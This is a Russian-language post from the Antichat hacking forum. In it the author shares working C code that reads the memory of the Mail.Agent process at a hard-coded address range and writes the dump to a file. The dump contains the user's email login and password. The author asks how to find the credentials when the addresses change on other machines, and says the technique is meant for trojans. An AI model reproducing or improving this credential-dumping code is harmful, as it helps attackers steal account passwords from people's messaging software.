Форум АНТИЧАТ - Реально ли это?

прикольная темка не буду создавать новой
спрошу свой вопрос

Делать мне нечего пытаюсь из памяти процесса маил агента выцепить данные о мыле и пароле. Посмотрел в оли дебаг и в артмани и выяснил что они где то тут 0x011B2000 - 0x011B3000 (до это выяснял как делать карту памяти процессов ниче полезного)

лано выяснил сделал!

Код:

        unsigned char *mem;

        DWORD st_addr=0x011B2000;

        HANDLE hProcess;

        HFILE f;



// эт моя фуекция через ToolHelp Process32First

if((thPID=GetPIDbyNameExe((char *)&szExE))==-1){ExitProcess(1); }



hProcess=OpenProcess(PROCESS_VM_READ,FALSE,thPID);



mem=(unsigned char *)LocalAlloc(LPTR,4096);



ReadProcessMemory(hProcess,(LPCVOID)st_addr,mem,4096,NULL);



f=_lcreat("d.txt", 0);

_lwrite(f,(LPCCH)mem,4096);

_lclose(f);



LocalFree(mem);

CloseHandle(hProcess);

ExitProcess(0);

ну запускаю смотрю файлик лежат логин пасс )

даю друзякам тестить хер... ну понятно адреса то разные

вопрос че делать???
я уже тут перечитал структуру PE заголовка научился выциплять образ exe из памяти )
делать карту памяти процесса .... но блин я хз в общем как артмани этот ищет какашко :(

а так тема же клевая особено в троянчек
из памяти прог цеплять данные крута.